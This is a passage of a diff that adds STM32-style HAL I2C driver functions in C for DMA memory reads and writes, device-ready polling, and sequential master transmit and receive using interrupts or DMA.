CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + hi2c->Memaddress = MemAddress; + hi2c->MemaddSize = MemAddSize; + hi2c->EventCount = 0U; + + if (hi2c->XferSize > 0U) + { + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmatx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmatx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmatx->XferHalfCpltCallback = NULL; + hi2c->hdmatx->XferM1CpltCallback = NULL; + hi2c->hdmatx->XferM1HalfCpltCallback = NULL; + hi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmatx, (uint32_t)hi2c->pBuffPtr, (uint32_t)&hi2c->Instance->DR, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address and Memory Address */ + if (I2C_RequestMemoryWrite(hi2c, DevAddress, MemAddress, MemAddSize, I2C_TIMEOUT_FLAG, tickstart) != HAL_OK) + { + /* Abort the ongoing DMA */ + dmaxferstatus = HAL_DMA_Abort_IT(hi2c->hdmatx); + + /* Prevent unused argument(s) compilation and MISRA warning */ + UNUSED(dmaxferstatus); + + /* Set the unused I2C DMA transfer complete callback to NULL */ + hi2c->hdmatx->XferCpltCallback = NULL; + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->XferSize = 0U; + hi2c->XferCount = 0U; + + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_ERR); + + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + return HAL_OK; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_SIZE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Reads an amount of data in non-blocking mode with DMA from a specific memory address. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be read + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Read_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + __IO uint32_t count = 0U; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + hi2c->Memaddress = MemAddress; + hi2c->MemaddSize = MemAddSize; + hi2c->EventCount = 0U; + + if (hi2c->XferSize > 0U) + { + if (hi2c->hdmarx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmarx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmarx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmarx->XferHalfCpltCallback = NULL; + hi2c->hdmarx->XferM1CpltCallback = NULL; + hi2c->hdmarx->XferM1HalfCpltCallback = NULL; + hi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmarx, (uint32_t)&hi2c->Instance->DR, (uint32_t)hi2c->pBuffPtr, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address and Memory Address */ + if (I2C_RequestMemoryRead(hi2c, DevAddress, MemAddress, MemAddSize, I2C_TIMEOUT_FLAG, tickstart) != HAL_OK) + { + /* Abort the ongoing DMA */ + dmaxferstatus = HAL_DMA_Abort_IT(hi2c->hdmarx); + + /* Prevent unused argument(s) compilation and MISRA warning */ + UNUSED(dmaxferstatus); + + /* Set the unused I2C DMA transfer complete callback to NULL */ + hi2c->hdmarx->XferCpltCallback = NULL; + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->XferSize = 0U; + hi2c->XferCount = 0U; + + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + return HAL_ERROR; + } + + if (hi2c->XferSize == 1U) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + else + { + /* Enable Last DMA bit */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_ERR); + + /* Enable DMA Request */ + hi2c->Instance->CR2 |= I2C_CR2_DMAEN; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Send Slave Address and Memory Address */ + if (I2C_RequestMemoryRead(hi2c, DevAddress, MemAddress, MemAddSize, I2C_TIMEOUT_FLAG, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->State = HAL_I2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Checks if target device is ready for communication. + * @note This function is used with Memory devices + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Trials Number of trials + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_IsDeviceReady(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint32_t Trials, uint32_t Timeout) +{ + /* Get tick */ + uint32_t tickstart = HAL_GetTick(); + uint32_t I2C_Trials = 1U; + FlagStatus tmp1; + FlagStatus tmp2; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + do + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(DevAddress); + + /* Wait until ADDR or AF flag are set */ + /* Get tick */ + tickstart = HAL_GetTick(); + + tmp1 = __HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_ADDR); + tmp2 = __HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_AF); + while ((hi2c->State != HAL_I2C_STATE_TIMEOUT) && (tmp1 == RESET) && (tmp2 == RESET)) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->State = HAL_I2C_STATE_TIMEOUT; + } + tmp1 = __HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_ADDR); + tmp2 = __HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_AF); + } + + hi2c->State = HAL_I2C_STATE_READY; + + /* Check if the ADDR flag has been set */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_ADDR) == SET) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Clear ADDR Flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + hi2c->State = HAL_I2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Clear AF Flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + } + + /* Increment Trials */ + I2C_Trials++; + } + while (I2C_Trials < Trials); + + hi2c->State = HAL_I2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in master I2C mode an amount of data in non-blocking mode with Interrupt. + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Seq_Transmit_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + __IO uint32_t Prev_State = 0x00U; + __IO uint32_t count = 0x00U; + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP) || (XferOptions == I2C_FIRST_AND_LAST_FRAME) || (XferOptions == I2C_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + hi2c->Devaddress = DevAddress; + + Prev_State = hi2c->PreviousState; + + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_TX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in master I2C mode an amount of data in non-blocking mode with DMA. + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Seq_Transmit_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + __IO uint32_t Prev_State = 0x00U; + __IO uint32_t count = 0x00U; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP) || (XferOptions == I2C_FIRST_AND_LAST_FRAME) || (XferOptions == I2C_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + hi2c->Devaddress = DevAddress; + + Prev_State = hi2c->PreviousState; + + if (hi2c->XferSize > 0U) + { + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmatx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmatx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmatx->XferHalfCpltCallback = NULL; + hi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmatx, (uint32_t)hi2c->pBuffPtr, (uint32_t)&hi2c->Instance->DR, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_TX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* If XferOptions is not associated to a new frame, mean no start bit is request, enable directly the DMA request */ + /* In other cases, DMA request is enabled after Slave address treatment in IRQHandler */ + if ((XferOptions == I2C_NEXT_FRAME) || (XferOptions == I2C_LAST_FRAME) || (XferOptions == I2C_LAST_FRAME_NO_STOP)) + { + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + } + + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_TX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in master I2C mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Seq_Receive_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + __IO uint32_t Prev_State = 0x00U; + __IO uint32_t count = 0U; + uint32_t enableIT = (I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP) || (XferOptions == I2C_FIRST_AND_LAST_FRAME) || (XferOptions == I2C_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + hi2c->Devaddress = DevAddress; + + Prev_State = hi2c->PreviousState; + + if ((hi2c->XferCount == 2U) && ((XferOptions == I2C_LAST_FRAME) || (XferOptions == I2C_LAST_FRAME_NO_STOP))) + { + if (Prev_State == I2C_STATE_MASTER_BUSY_RX) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + /* Remove Enabling of IT_BUF, mean RXNE treatment, treat the 2 bytes through BTF */ + enableIT &= ~I2C_IT_BUF; + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + + /* If transfer direction not change and there is no request to start another frame, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((Prev_State != I2C_STATE_MASTER_BUSY_RX) || (IS_I2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 1)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable interrupts */ + __HAL_I2C_ENABLE_IT(hi2c, enableIT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in master mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref I2C_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Seq_Receive_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + __IO uint32_t Prev_State = 0x00U; + __IO uint32_t count = 0U; + uint32_t enableIT = (I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_I2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP) || (XferOptions == I2C_FIRST_AND_LAST_FRAME) || (XferOptions == I2C_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + /* Clear Last DMA bit */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = XferOptions; + hi2c->Devaddress = DevAddress; + + Prev_State = hi2c->PreviousState; + + if (hi2c->XferSize > 0U) + { + if ((hi2c->XferCount == 2U) && ((XferOptions == I2C_LAST_FRAME) || (XferOptions == I2C_LAST_FRAME_NO_STOP))) + { + if (Prev_State == I2C_STATE_MASTER_BUSY_RX) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + /* Enable Last DMA bit */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + if ((XferOptions == I2C_LAST_FRAME) || (XferOptions == 